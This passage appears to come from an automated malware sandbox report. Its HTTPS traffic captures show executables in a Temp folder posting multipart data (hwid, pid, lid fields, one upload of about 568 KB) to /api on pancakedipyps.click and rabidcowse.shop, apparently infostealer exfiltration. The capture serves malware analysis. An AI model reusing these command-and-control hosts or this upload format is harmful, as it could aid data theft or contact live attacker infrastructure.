                                                                                                                                                                                                                                                  Data Ascii: KT5jwDJsrdsS96sTvek5dxb8xdscsSMV4jA2bfZhpH0kCS6TbC/iwhLhq1L+o3s/Ve7X3HrfUlmhaXp/gnn7bXISfPUAT6/RUbepJOu8eTpT/+qlSuZlSbllYX3qPuUkPCYug35e7JBK+bNVyLJnN1HuxdZn9mdErCFHOrV3/Gl2XyCLOCH6gBz57wS96TlrDa2HzBSzbgCuI3d9/CykJHZfNot5YrDCVLr9FrqPVxld7tWWT+1PcKJgbzOjaPs
                                                                                                                                                                                                                                                  2025-01-03 08:50:21 UTC1369INData Raw: 70 6c 77 49 62 43 51 43 76 6d 73 46 75 2b 6a 62 7a 70 41 2b 35 4f 6c 65 74 52 79 51 4c 6c 6b 64 77 69 6e 62 2b 6c 6b 62 79 46 51 36 6a 42 71 70 64 78 45 68 39 55 67 2f 72 39 6e 50 6b 44 70 6c 4e 55 45 37 6a 45 57 6a 69 4d 70 66 5a 73 77 71 6e 77 6b 52 79 37 2b 50 57 2b 73 31 30 53 6f 70 69 44 2b 6f 47 6f 35 58 62 69 61 32 30 4b 68 4b 52 7a 35 49 32 55 73 35 43 61 36 4e 6a 39 4b 50 5a 78 75 4d 37 32 65 53 2f 6e 39 56 61 58 6a 4a 33 6c 45 75 49 7a 62 41 2b 4a 6a 58 4c 46 67 64 7a 37 6a 51 4e 52 43 5a 78 68 6f 79 44 42 32 73 35 4a 39 75 75 41 5a 38 62 5a 2f 42 32 6a 74 31 35 56 4b 35 6d 64 66 39 79 30 68 4d 75 51 6d 30 79 52 31 46 57 6d 48 64 69 32 7a 77 31 79 79 2f 52 4b 39 6a 69 64 35 54 72 69 4d 32 33 48 69 66 30 43 77 64 58 42 77 67 6e 33 74 59 6d 63 52
                                                                                                                                                                                                                                                  Data Ascii: plwIbCQCvmsFu+jbzpA+5OletRyQLlkdwinb+lkbyFQ6jBqpdxEh9Ug/r9nPkDplNUE7jEWjiMpfZswqnwkRy7+PW+s10SopiD+oGo5Xbia20KhKRz5I2Us5Ca6Nj9KPZxuM72eS/n9VaXjJ3lEuIzbA+JjXLFgdz7jQNRCZxhoyDB2s5J9uuAZ8bZ/B2jt15VK5mdf9y0hMuQm0yR1FWmHdi2zw1yy/RK9jid5TriM23Hif0CwdXBwgn3tYmcR


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  17192.168.2.449931188.114.97.34436408C:\Users\user\AppData\Local\Temp\1001527001\legs.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=YU60K533F8DXEU
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 568784
                                                                                                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: 2d 2d 59 55 36 30 4b 35 33 33 46 38 44 58 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 59 55 36 30 4b 35 33 33 46 38 44 58 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 55 36 30 4b 35 33 33 46 38 44 58 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 64 65 63 0d 0a 2d 2d 59 55 36 30 4b 35 33 33 46 38
                                                                                                                                                                                                                                                  Data Ascii: --YU60K533F8DXEUContent-Disposition: form-data; name="hwid"F9C89AE3A748EEF1AC8923850305D13E--YU60K533F8DXEUContent-Disposition: form-data; name="pid"1--YU60K533F8DXEUContent-Disposition: form-data; name="lid"FATE99--dec--YU60K533F8
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: 18 5f 67 1f 8f 3f 0d 3f 54 d4 f3 b2 cb f7 57 5f b1 fb 4c 47 7c 05 06 a4 98 13 00 df 06 cf 62 1e 7e 63 e7 51 be d9 88 c3 df 60 71 c6 e5 ff 33 02 c8 43 2a f0 c8 6f 43 70 3f 88 33 a4 e6 fa 01 66 2e 1f 38 0d 07 44 86 e0 b8 47 65 6b 1d fc 66 f6 63 36 14 43 56 8a 79 51 be f4 d9 b5 94 df 79 53 2d 23 10 b4 97 6f cf 59 eb 03 ad 6d 97 bc 9f c7 79 3d af 16 f1 f4 c0 11 da c4 9b a3 35 1a b8 1c f7 9a 64 b5 fc cb 3f f0 03 61 92 e8 d6 fb 14 e6 22 7b e6 cb 5f db da b1 94 f2 38 05 f3 bc 6f b8 33 9a e9 8d 3e ca a0 f3 09 3d f0 bd 72 ad 92 48 18 db cc 79 77 69 d0 aa 69 27 bf 07 4d 39 19 62 92 b2 7c b5 7d f1 6f 31 1c 91 a0 7a 13 b1 30 21 71 5b 33 7a d4 54 2e ab 3f 0c 91 37 b9 7c 1d 6c 73 be 5b da 7f 95 af ee e3 cf 01 49 4b 23 cc 89 d3 ce bb 9e a4 a2 fe 43 b1 75 15 4a d7 5a a8
                                                                                                                                                                                                                                                  Data Ascii: _g??TW_LG|b~cQ`q3C*oCp?3f.8DGekfc6CVyQyS-#oYmy=5d?a"{_8o3>=rHywii'M9b|}o1z0!q[3zT.?7|ls[IK#CuJZ
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: aa dc 3d fa 59 f1 b8 8c a6 cb a6 f1 47 6d 6c e0 e5 c2 ee e0 24 7c b0 97 68 b9 c3 57 7a fd 57 ff eb 6f 6d aa dc 23 6a 6a 0a 25 c1 50 71 88 29 c4 98 cd c5 83 6d 3b fe d5 62 a9 75 11 88 41 fa ef c8 f5 f9 97 20 69 e6 bf 43 ac 73 b3 35 bc 01 8d 84 04 10 a7 c8 ff d7 a0 69 a9 fe 3e 51 13 88 80 c3 18 de c9 3d bb fb 80 f4 7e 9a 2a 02 c7 d7 af ef 93 6d 94 49 86 aa 57 77 d6 f5 cb 55 4a 81 c5 c6 1b 90 af e8 b3 f4 e3 6a a2 ed 1f d1 57 b2 ef f3 f6 fc 05 14 c1 b8 7a c2 cf e3 7f da 0a 22 eb 90 03 2d de fa 83 20 05 97 19 e3 d3 a3 10 2d 1c 1d 00 1f 5b 50 29 e2 c8 af eb 6a 78 e2 ae 1a 30 09 bb 09 0f 38 41 44 f0 61 2a e2 35 a9 40 cb 23 77 6f 83 ce 96 fc 29 52 f1 7c ed 1a be d4 24 bd 27 15 31 52 42 e6 32 61 25 60 ef 00 8b 98 b8 8f e4 cd 29 60 46 20 81 ec d5 e3 c9 fc fa 8d 74
                                                                                                                                                                                                                                                  Data Ascii: =YGml$|hWzWom#jj%Pq)m;buA iCs5i>Q=~*mIWwUJjWz"- -[P)jx08ADa*5@#wo)R|$'1RB2a%`)`F t
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: 66 82 40 f4 ee ff 7c f0 5e 96 fd b9 b2 fd 63 65 c5 cb 9a 4c 24 0e 11 6e a1 6f 1f 27 df c8 4d 03 74 35 22 95 86 26 f3 a3 78 95 80 07 16 bb 7e 4c c3 52 05 ef 94 63 82 05 4f a1 70 c4 01 ae e1 c1 41 9c 47 89 ca 8b 59 f6 43 93 8f 3c b0 f3 e4 db 37 af ff d0 75 b3 9c 1f 42 8f 74 5e 9c 03 c4 2b 10 51 61 28 1f 05 5c db 0a 9e 3c 81 4b 41 bd fe 7f a7 d6 da 5c b0 56 6f df af 37 68 db 85 eb d7 63 91 77 66 ab 7d 79 cd 8a 4f b9 55 7b 61 bc 78 57 e4 17 8a b3 44 fd 2c bd 1a 02 12 71 90 db e4 de 75 2b 9e 00 79 e0 fc 7d 8e 14 51 83 1b 8a 2b 45 ed ca db a5 87 fd 2e 21 f0 1a 4d ef 14 20 eb b2 d4 57 84 2c 6a 49 a9 a2 38 11 f0 46 54 dd 12 64 36 84 b8 02 c2 50 c1 dc b0 9c d8 48 b5 d6 33 86 be 90 fa 3f 11 2f 0e 91 5a 00 66 11 cd 8e d3 43 ed 04 07 17 7f ba a7 a3 d7 0f ec df bd 11
                                                                                                                                                                                                                                                  Data Ascii: f@|^ceL$no'Mt5"&x~LRcOpAGYC<7uBt^+Qa(\<KA\Vo7hcwf}yOU{axWD,qu+y}Q+E.!M W,jI8FTd6PH3?/ZfC
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: 11 70 27 d2 4b 34 34 b9 49 99 c9 88 69 64 95 3c 70 99 2f bf f4 40 82 53 08 ea 1f c1 44 7c f3 88 10 ca b8 82 03 38 04 9e bd 12 98 d5 e7 56 04 02 a1 8d d0 42 86 3f 0c ea 87 46 46 06 c2 61 7e eb 1a bd fc 0c 8b a6 c6 40 ba 39 ed f7 09 b2 e9 d1 e3 e1 19 11 da 15 5c 15 6f 84 c2 ea 5b 25 6b b2 55 c0 99 49 79 88 e8 c6 b7 3c 80 c4 23 02 a5 6f f9 9a f8 6b 18 b6 45 6a ae 55 fa dc 24 4d 34 1f 90 14 9e 70 32 d6 e7 4e 61 ce 4c 5e dc bf 9e 3b a4 8e 19 0e 7c 34 38 1c 7c 6c 41 b9 bb 88 d1 aa 2d 66 a7 2d d5 bc 10 cc b8 76 9c 2c b6 fe 5a d3 76 58 be 75 51 d2 be 3e 4c 43 b4 ad 9c 13 c6 4d 11 14 18 09 c2 80 60 0c 8c b1 0d fa 77 09 d0 47 16 8c c4 80 6d 34 ad ea 5c b1 53 0c 26 1c 91 6e 11 a2 ef 65 d7 4c fd 24 34 2e 55 f0 3a e7 6d 3c da fe bc 00 73 55 f8 a0 5d a8 aa df 96 51 ac
                                                                                                                                                                                                                                                  Data Ascii: p'K44Iid<p/@SD|8VB?FFa~@9\o[%kUIy<#okEjU$M4p2NaL^;|48|lA-f-v,ZvXuQ>LCM`wGm4\S&neL$4.U:m<sU]Q
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: bd b4 08 94 1c 8b bb 0c ae 8e 26 a2 5a 49 17 4f 4f 66 69 e0 a1 b9 98 71 eb dc ba 08 9e 4b 58 0a 5b eb 02 dd 1c 42 c2 33 92 1f 5f 89 f7 45 52 0d 10 58 23 15 bf 6e 19 32 bf ba ac 5b 30 86 94 40 84 6a 3f 9f 00 31 dc d3 05 99 a4 f3 30 f2 f9 2e 1c ec f2 a8 1e 30 53 f1 91 e5 ed 26 07 49 e7 00 fb fd 6c 71 d6 12 48 6d a3 54 ac 05 ce 82 d3 60 ca 5d 51 0c 68 5e 31 a5 ee 80 8d 41 ad cc ca 81 07 ca 77 37 07 74 31 44 54 85 9a 8c 7b 5e 2f c2 64 53 c6 58 b7 ca ce 02 f9 3f 28 60 4e da b4 a6 8d 14 b4 ef 3a c2 83 36 07 25 54 42 b4 09 43 73 1c 30 8c 87 5b 90 c0 f2 11 dc 25 0a 76 97 2d 0b d3 db 8d 7b c5 41 d9 e6 ed bd 01 28 a0 c1 7e a2 89 a8 2c d4 2a 22 44 cf e9 94 64 40 7d 07 c7 8b 55 c1 69 86 fb 87 8d f5 c3 8e 83 1b 4d 1f 52 0e 8f b3 1f 55 a6 a8 28 53 b3 0c fe 28 f4 1d 1d
                                                                                                                                                                                                                                                  Data Ascii: &ZIOOfiqKX[B3_ERX#n2[0@j?10.0S&IlqHmT`]Qh^1Aw7t1DT{^/dSX?(`N:6%TBCs0[%v-{A(~,*"Dd@}UiMRU(S(
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: 03 df f4 6a 4b d8 92 d4 7a 40 90 e3 85 28 f8 b9 38 5a 0e aa d6 e8 6d 96 54 dc ce f4 a6 c5 16 59 f8 d1 84 0b 4c 69 c3 36 45 70 07 25 c1 a1 b9 87 80 74 73 6a da ee e9 5b 97 eb 8e 2b ca 94 37 ea 6a 80 6e 9e 20 fc ce 63 f4 34 9a fe 76 63 d4 32 b7 bf 77 8c ff bb 2d f4 45 9d 70 9d 33 44 66 64 05 f0 df 33 37 ec 47 92 16 f9 f9 3e c2 f4 79 eb f0 3d 05 43 dc bf 70 bc e3 ba 80 1d a3 8c f8 09 f1 a9 5e 41 b6 2d 60 7f 97 25 02 8d 8e dc 3d 24 7e c6 61 ae 34 ab 4b 0d 55 43 69 81 fa e4 c1 a1 8f b8 a4 83 5e 86 da 3d 8a 7d 8e 65 3b 42 cf c8 92 fa 26 70 e9 75 ba 9d 5f 39 43 e5 07 23 91 96 63 98 aa 07 a4 e7 ac 9f 56 57 1a 48 d3 b8 fc ed 1a c3 23 48 26 89 c2 0a f7 40 68 37 51 21 14 11 05 4e 0c 8a dd ba 6b 31 7e 54 e4 90 f8 d1 d5 67 f3 0d a1 0a 24 af 26 ed 12 13 0a 2f 34 74 f9
                                                                                                                                                                                                                                                  Data Ascii: jKz@(8ZmTYLi6Ep%tsj[+7jn c4vc2w-Ep3Dfd37G>y=Cp^A-`%=$~a4KUCi^=}e;B&pu_9C#cVWH#H&@h7Q!Nk1~Tg$&/4t
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: 99 61 ae b8 d4 7e 41 4f 5f 45 51 e5 be f2 33 a4 0d b2 cf 60 38 46 46 b7 ff 44 18 bd d6 f5 91 d9 4e 06 51 00 94 97 8e 97 97 1b 78 c5 01 7c f0 82 76 7d b8 b4 a3 1f 67 2a e3 32 20 f4 fb 05 a7 bb 19 7f d6 6d af 6b 37 2a 5e cf 50 e1 ca 9c 23 e9 6f d9 5b 2e 6a 5d a5 71 83 3f 04 8b 6e b5 72 f9 ce b1 b5 63 e6 90 94 cc 4a 95 4d 7b 76 fa a4 ad f7 55 a0 4f 4b 3f 9a d1 1a 9a 4f 53 e7 26 04 ef 4a 9f b2 81 e3 e0 bf 29 fd df 7a 06 6f 1a 02 42 01 d4 83 97 34 b6 e1 08 07 3b 7f 5b 1b ff 40 cf 0e da 78 5d 10 b4 35 76 92 53 c5 3c b8 83 7c 2c bf 8b cd e9 35 16 88 51 ca 1c 7c 2f 07 b4 8e d0 ae 7f 4e cb 55 6c b9 1d a0 fd 38 fc f3 1d e3 5b 5a 60 ba 24 aa 01 51 e9 7d e2 48 10 26 ca 5a 00 dc 42 a1 79 97 4e 39 13 26 45 87 5d a5 64 76 d5 e5 7b 75 4b fd 4d f2 94 1a 13 34 29 c3 40 c2
                                                                                                                                                                                                                                                  Data Ascii: a~AO_EQ3`8FFDNQx|v}g*2 mk7*^P#o[.j]q?nrcJM{vUOK?OS&J)zoB4;[@x]5vS<|,5Q|/NUl8[Z`$Q}H&ZByN9&E]dv{uKM4)@
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: 01 5f 58 cd 02 f8 79 4b 05 9a aa 2e 02 62 9f f5 05 3c 15 51 ea 52 81 d0 d8 f3 8e 55 2f 8b 3b 6c 08 d7 b7 10 f7 1c e4 8e f9 82 7a 75 46 df 42 cc 7a 18 4c 83 43 2f 2c 86 ab f4 c1 87 65 5b 26 a8 54 ec ac 3f 0d 15 86 83 24 51 e7 57 2b 75 8e 84 c9 6c 8d 06 96 0d 70 6b 74 47 12 09 1d 6d 88 4b bd 85 7e 7c 17 85 40 52 9b 49 e3 ed 75 63 a7 a6 c0 54 99 3d c5 28 b3 7b 16 c2 1b 12 ab 7b a5 df 15 10 bd 44 85 b5 ac fa c2 a2 c2 26 71 ef cc db 30 47 dc b4 ae 60 ce 43 b1 8b 57 5c 22 8c 79 55 fa dd 2c bd 4c 47 73 09 fe dc 7e 18 e1 31 9d 1c cf e8 ae df ac dd 3b c1 73 ec 8a a9 30 2a 94 ba 3e 33 44 df 0d 2b cd f2 ea 94 62 cb d2 a7 dd b4 33 00 8e 0a 33 5b f3 86 af eb 4d 64 07 c4 6f 5a e9 b6 67 33 a4 38 57 0d a8 d7 da 08 5d 3d 6c 8f a3 58 5d 85 cb aa 7a e0 92 76 61 da 60 b2 ea
                                                                                                                                                                                                                                                  Data Ascii: _XyK.b<QRU/;lzuFBzLC/,e[&T?$QW+ulpktGmK~|@RIucT=({{D&q0G`CW\"yU,LGs~1;s0*>3D+b33[MdoZg38W]=lX]zva`
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: d6 5f cd ad b7 e7 03 3a a2 05 df 18 2f 0f 8e c8 81 77 32 7a 48 f0 b4 4f 34 dd 3c e4 c7 76 cb fe 64 93 ab 5b 3f 9e 09 6b 80 93 eb 76 ea fc 9f 01 8e ab 95 b0 44 5c 21 2f d0 59 bb ed 75 eb ae f3 51 ea 0f 24 da af f6 d6 bb 24 39 f0 5b ee 94 2e ee 79 9d 38 84 e3 aa 04 54 49 df fc a8 92 f0 16 43 b4 ad 41 61 07 95 77 a3 8f ed 35 82 1d 21 d9 2a 70 b8 fe 7a 5a 98 9b 4a e3 6e 13 de d3 a3 ef 3a f1 79 51 43 31 f3 57 cd d2 3a c4 6f 11 85 3e 3b 50 bb 92 43 07 ee c8 6d d8 5f 5b fb 28 82 e7 be a0 8b d2 30 86 87 04 95 14 13 2c b3 05 5f 1f d5 fa 14 fd 66 93 7d a4 d8 03 ca 76 f2 52 97 f6 a2 52 5c b0 73 e3 c5 c2 77 9d 9b 23 79 59 18 8e 9b 99 f4 34 06 c2 cd b9 36 63 c7 d7 de d6 44 1f c1 ea b7 72 3b 9d 0c 14 d7 6a e3 48 55 7c f8 c4 60 0d bd 36 b1 39 1a 61 d8 e4 6f 16 c1 bb ba
                                                                                                                                                                                                                                                  Data Ascii: _:/w2zHO4<vd[?kvD\!/YuQ$$9[.y8TICAaw5!*pzZJn:yQC1W:o>;PCm_[(0,_f}vRR\sw#yY46cDr;jHU|`69ao
                                                                                                                                                                                                                                                  2025-01-03 08:50:26 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:26 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=g0ulthcft2rn7apol54kocmasa; expires=Tue, 29 Apr 2025 02:37:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ld%2FUco%2FiAg4yT%2F21wA8a31lGX3o7V%2Bad0Bk3MT1OfK1%2Bk0l7LUCe%2BFpKmPTJwd8kToIsLFXHGsgbwzaxsV60%2FoqZfKa%2F308IFjL%2BT%2B1eIixAdblpWaXkiBmdMrFhB8SSrFNA02%2BV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bdaed9f30f80-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=1516&rtt_var=1544&sent=357&recv=587&lost=0&retrans=0&sent_bytes=2847&recv_bytes=571330&delivery_rate=538844&cwnd=207&unsent_bytes=0&cid=543043371dfce3b7&ts=3172&x=0"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  18192.168.2.449934172.67.156.1274437144C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=859Q2T4ZR
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 18112
                                                                                                                                                                                                                                                  Host: rabidcowse.shop
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC15331OUTData Raw: 2d 2d 38 35 39 51 32 54 34 5a 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 38 35 39 51 32 54 34 5a 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 35 39 51 32 54 34 5a 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 44 56 78 34 49 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 38 35 39 51 32 54 34 5a 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                  Data Ascii: --859Q2T4ZRContent-Disposition: form-data; name="hwid"F9C89AE3A748EEF120A4C476FD51BCB1--859Q2T4ZRContent-Disposition: form-data; name="pid"2--859Q2T4ZRContent-Disposition: form-data; name="lid"7DVx4I--installs--859Q2T4ZRContent-D
                                                                                                                                                                                                                                                  2025-01-03 08:50:23 UTC2781OUTData Raw: 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35
                                                                                                                                                                                                                                                  Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
                                                                                                                                                                                                                                                  2025-01-03 08:50:24 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:24 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=90cmqds988vsnhljogd723bqck; expires=Tue, 29 Apr 2025 02:37:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AWYtBKn%2B3ga67g85eZmWDWmnax9kq23vV%2F7w90oAOpcn%2F%2BzerGT%2B0oP2%2BPTGpVaCWNmkgHorKj9aYnpV9M3e4k3VqnCXSPiKLM8cPltvPsX7ftqMIxhPkENnL45OinolJ2o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8fc1bdb1ee1732fa-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1957&rtt_var=742&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2837&recv_bytes=19064&delivery_rate=1468074&cwnd=164&unsent_bytes=0&cid=8d5c2df0ea12dac4&ts=644&x=0"
                                                                                                                                                                                                                                                  2025-01-03 08:50:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                  2025-01-03 08:50:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  19192.168.2.449945172.67.156.1274437144C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:24 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=728HXUBQ
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8727
                                                                                                                                                                                                                                                  Host: rabidcowse.shop
                                                                                                                                                                                                                                                  2025-01-03 08:50:24 UTC8727OUTData Raw: 2d 2d 37 32 38 48 58 55 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 39 41 45 33 41 37 34 38 45 45 46 31 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 37 32 38 48 58 55 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 32 38 48 58 55 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 44 56 78 34 49 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 37 32 38 48 58 55 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                                  Data Ascii: --728HXUBQContent-Disposition: form-data; name="hwid"F9C89AE3A748EEF120A4C476FD51BCB1--728HXUBQContent-Disposition: form-data; name="pid"2--728HXUBQContent-Disposition: form-data; name="lid"7DVx4I--installs--728HXUBQContent-Dispo
                                                                                                                                                                                                                                                  2025-01-03 08:50:25 UTC1127INHTTP/1.1 200 OK
